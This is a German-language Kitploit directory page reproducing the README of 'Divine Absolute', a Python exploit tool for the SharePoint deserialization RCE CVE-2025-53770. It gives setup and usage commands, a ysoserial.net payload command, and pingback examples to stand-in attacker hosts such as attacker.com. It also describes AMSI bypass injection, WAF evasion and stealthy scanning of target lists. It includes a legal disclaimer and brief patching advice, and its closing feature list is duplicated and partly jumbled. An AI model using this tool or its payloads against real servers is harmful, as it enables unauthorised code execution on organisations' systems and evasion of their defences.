Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-53770 — Ein hochentwickeltes, assistentengesteuertes Python-Exploit-Tool, das auf CVE-2025-53770 abzielt, eine kritische (CVSS 9.8) nicht authentifizierte Remote-Codeausführungs-Sicherheitslücke (RCE) in lokalen Microsoft SharePoint Server (2016, 2019, Subscription Edition). | Kitploit
Tools/GitHubGitHub/exfil0/cve-2025-53770
Privilege EscalationAufklärungPayload-GenerierungSchwachstellenanalyseExploitationIDS/IPS-UmgehungWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and Control
GitHubexfil0/cve-2025-53770
51vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-53770

Ein hochentwickeltes, assistentengesteuertes Python-Exploit-Tool, das auf CVE-2025-53770 abzielt, eine kritische (CVSS 9.8) nicht authentifizierte Remote-Codeausführungs-Sicherheitslücke (RCE) in lokalen Microsoft SharePoint Server (2016, 2019, Subscription Edition).

Repository anzeigen

Divine Absolute - CVE-2025-53770 Exploit-Tool

License
Python

Übersicht

Divine Absolute ist ein hochentwickeltes, wizardgesteuertes Python-Exploit-Tool, das auf CVE-2025-53770 abzielt, eine kritische (CVSS 9.8) nicht authentifizierte Remote-Codeausführung (RCE) Schwachstelle in lokalen Microsoft SharePoint Server (2016, 2019, Subscription Edition). Diese Schwachstelle, die am 19. Juli 2025 als Zero-Day offengelegt wurde, beruht auf der Deserialisierung nicht vertrauenswürdiger Daten in /_layouts/15/ToolPane.aspx. Das Tool ist ausschließlich für ethische Penetrationstests und autorisierte Sicherheitsforschung konzipiert und bietet beispiellose Präzision, Heimlichkeit und Anpassungsfähigkeit für Aufklärung, Ausnutzung und Verifizierung.

Repository: https://github.com/exfil0/CVE-2025-53770

⚠️ Rechtlicher Hinweis: Dieses Tool ist nur für rechtmäßige, autorisierte Nutzung in kontrollierten Umgebungen mit ausdrücklicher Genehmigung bestimmt. Die unbefugte Verwendung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal und kann schwerwiegende rechtliche Konsequenzen haben. Der Autor übernimmt keine Haftung für Missbrauch.

Funktionen

  • Modi:
    • Recon: Erkennt SharePoint-Präsenz, Version und Zugänglichkeit von ToolPane.aspx mit erweiterter Bewertung und Regex (z. B. 16.0.0.\d+-\w+?).
    • Exploit: Liefert Payloads über ToolPane.aspx mit robusten Umgehungen.
    • Full: Kombiniert Recon und Exploitation, optional mit aggressiver Ausnutzung.
  • Payload-Generierung:
    • Integriert ysoserial.net für .NET-Deserialisierungs-Payloads (z. B. ObjectDataProvider, LosFormatter).
    • Optional pythonnet als Fallback für HTTP/DNS-Pingback-Payloads (z. B. WebRequest.Create, Dns.GetHostEntry).
    • Unterstützt GZIP-Kompression mit explizitem Kodieren/Dekodieren und Base64-Validierung.
    • Injiziert AMSI-Umgehungen (Basic-Reflection, obfuskiert oder benutzerdefinierte Snippets) in PowerShell-Befehle, einschließlich Base64-kodierter (-enc) Payloads.
  • Umgehungen:
    • URI-Verschleierung: Zufällige oder feste Suffixe (z. B. /xp.aspx, UUID-basiert).
    • Referer-Spoofing: Keine, externe Domains (z. B. www.google.com), benutzerdefinierte URLs oder interne SharePoint-Pfade (z. B. /_layouts/15/sharepoint.aspx).

CVE-2025-53770 Kontext

  • Schwachstelle: Nicht authentifizierte RCE via Deserialisierung in /_layouts/15/ToolPane.aspx.
  • Betroffen: SharePoint Server 2016, 2019, Subscription Edition (EOL 2010/2013 ebenfalls verwundbar).
  • Nicht betroffen: SharePoint Online (M365).
  • Ausgenutzt: Seit dem 18. Juli 2025 in Kampagnen wie „ToolShell" von staatlich geförderten Akteuren (z. B. Linen Typhoon).
  • Patches: Microsoft-Patches (z. B. KB5002768, KB5002754) veröffentlicht am 19. Juli 2025, beheben vollständig. CISA KEV-Eintrag verlangt Patchen auf Bundesebene bis zum 21. Juli 2025.
  • Schutzmaßnahmen: Patchen, Schlüssel nach dem Patchen rotieren, AMSI/Defender (Vollmodus) aktivieren, POSTs auf /ToolPane.aspx überwachen, WAF-Regeln verwenden (z. B. Cloudflare).

Installation

Voraussetzungen

  • Python 3.8+
  • Abhängigkeiten:
    root@kitploit:~
    pip install requests termcolor
    
  • Optional (für .NET-Serialisierungs-Fallback):
    root@kitploit:~
    pip install pythonnet
    
  • ysoserial.net:
    • Herunterladen von ysoserial.net releases.
    • ysoserial.exe in einem bekannten Pfad platzieren (z. B. ./ysoserial.exe).
  • Mono/Wine (Nicht-Windows-Systeme):
    root@kitploit:~
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (via Homebrew)
    brew install mono
    
  • Docker-Lab (empfohlen zum Testen):
    root@kitploit:~
    docker pull mcr.microsoft.com/sharepoint/server:2019
    

Einrichtung

  1. Repository klonen:
    root@kitploit:~
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
    
  2. Python-Abhängigkeiten installieren:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. Sicherstellen, dass ysoserial.exe zugänglich ist oder den Pfad während der Ausführung angeben.
  4. (Optional) Mono/Wine für Nicht-Windows-Systeme überprüfen.

Nutzung

Führen Sie den interaktiven Assistenten aus:

root@kitploit:~
python divine_absolute.py

Arbeitsablauf

  1. Modusauswahl:
    • Recon: Scannt nach SharePoint-Präsenz und Version.
    • Exploit: Sendet Payload an ToolPane.aspx.
    • Full: Recon + Exploit (optionaler aggressiver Modus).
  2. Zieleingabe:
    • Einzelne URL (z. B. https://sharepoint.example.com).
    • Datei mit URLs (eine pro Zeile).
  3. Payload-Konfiguration:
    • ysoserial.net: Pfad, Gadget (z. B. ObjectDataProvider) und Befehl (z. B. cmd /c whoami) angeben.
    • File: Base64-GZIP-Payload aus Datei laden.
    • String: Base64-GZIP-Payload direkt eingeben.
    • Pingback: HTTP/DNS-Pingback generieren (z. B. http://attacker.com/callback oder sub.attacker.com).
    • AMSI-Umgehung: NONE, BASIC_REFLECTION, oder benutzerdefiniertes Snippet wählen.

Beispielbefehle

  • Aufklärung:
    root@kitploit:~
    python divine_absolute.py
    # Wählen: Mode=Recon, Target=https://sharepoint.example.com
    
  • Exploit mit ysoserial.net:
    root@kitploit:~
    python divine_absolute.py
    # Wählen: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
    
  • Full Mode mit Verifizierung:
    root@kitploit:~
    python divine_absolute.py
    # Wählen: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
    
  • DNS-Pingback:
    root@kitploit:~
    python divine_absolute.py
    # Wählen: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
    

Ausgabe

Ergebnisse werden in xanthorox_results.json gespeichert mit den Feldern:

  • target: Getestete URL.
  • sharepoint_detected: Boolean.
  • toolpane_accessible: Boolean.
  • exploited: Boolean (Payload gesendet).
  • verified_rce: Boolean/None (RCE bestätigt).
  • error: Aufgetretene Fehler.

Beispiel:

root@kitploit:~
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

Behobene Verbesserungen

Diese Version behebt:

  • Adaptive Ratenbegrenzung: Ignoriert Nicht-Wiederholungsfehler (z. B. 404) für Erfolgs-/Fehlerzählungen; erzwingt einen minimalen RPS-Floor (0,01).
  • AMSI-Injektion: Dekodiert und injiziert Umgehungen in Base64-kodierte PowerShell--enc-Befehle; unterstützt Nicht-PowerShell (z. B. cmd.exe) mit Warnungen.
  • Pingback-Fallback: Verwendet pythonnet für zuverlässigen DNS-Pingback mit Dns.GetHostEntry (experimentell, erfordert Gadget für vollständige Wirkung).

Testempfehlungen

  • Laboraufbau: Verwenden Sie einen ungepatchten SharePoint Server 2019 Docker-Container für sicheres Testen.
  • WAF-Tests: Validieren Sie Umgehungen gegen Cloudflare oder ähnliche WAFs mit adaptivem RPS.
  • Payload-Tests: Generieren Sie Payloads mit ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 und überprüfen Sie DNS-Protokolle.

Bekannte Einschränkungen

  • Pingback-Zuverlässigkeit: Dns.GetHostEntry in pythonnet wird möglicherweise ohne bestimmte Gadget-Kette nicht ausgelöst.
  • Komplexe Befehle: Nicht standardmäßige PowerShell-Befehle erfordern möglicherweise manuelle AMSI-Umgehungsinjektion.
  • WAF-Erkennung: Einige WAFs können Payloads trotz Umgehungen blockieren; gründlich testen.

Mitwirken

Beiträge sind willkommen! Bitte:

  1. Repository forken.
  2. Einen Feature-Branch erstellen (git checkout -b feature/awesome-improvement).
  3. Änderungen committen (git commit -m "Add awesome improvement").
  4. In den Branch pushen (git push origin feature/awesome-improvement).
  5. Einen Pull-Request öffnen.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert. Siehe LICENSE für Details.

Danksagungen

  • xAI: Für die Inspiration zu hochmoderner Sicherheitsforschung.
  • ysoserial.net Team: Für den Generator für .NET-Deserialisierungs-Payloads.
  • Security-Community: Für Einblicke in die Ausnutzung und Schutzmaßnahmen zu CVE-2025-53770.

Kontakt

  • Autor: @exfil0
  • Issues: GitHub Issues
  • Telegram: https://t.me/GOTOCVE

Hinweis: Überprüfen Sie Payloads und Konfigurationen immer zuerst in einer kontrollierten Laborumgebung. Bleiben Sie ethisch, bleiben Sie legal.

Tool herunterladen
  • Heimlichkeit:
    • Adaptive Ratenbegrenzung mit einem minimalen RPS-Floor (0.01) und Burst-Kontrolle.
    • Thread-sichere Gleichzeitigkeit mit lock-geschütztem Pacing und Jitter (0-0,1 s).
  • Verifizierung:
    • Robuste RCE-Bestätigung mit kompilierten ODER-Regexes, Wiederholungen bei RequestException und anpassbaren Statuscodes/Pfaden.
  • Aufklärung:
    • Verbesserte SharePoint-Erkennung über Header (z. B. MicrosoftSharePointTeamServices), Pfade (z. B. /versions.aspx) und Regexes.
  • Ausgabe:
    • JSON-Ergebnisse mit forensischer Protokollierung zur Analyse.
  • Benutzerfreundlichkeit:
    • Interaktiver Assistent für einfache Konfiguration.
    • Unterstützt Mono/Wine für ysoserial.net auf Nicht-Windows-Systemen.
    • Proxy-Unterstützung (HTTP/SOCKS5) und anpassbare Timeouts.
  • CONCAT_OBFUSCATED
  • Umgehungsoptionen:
    • URI: NONE, FIXED (z. B. /xp.aspx), RANDOM (UUID-basiert).
    • Referer: DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.
  • Netzwerkeinstellungen:
    • Proxy (z. B. http://127.0.0.1:8080).
    • Threads, Timeout, Jitter und Ratenlimit (RPS).
  • RCE-Verifizierung:
    • Pfad (z. B. /sitepages/result.txt), Regexes (z. B. Xanthorox.*), Statuscodes (z. B. 200,403), Versuche, Verzögerung und Timeout angeben.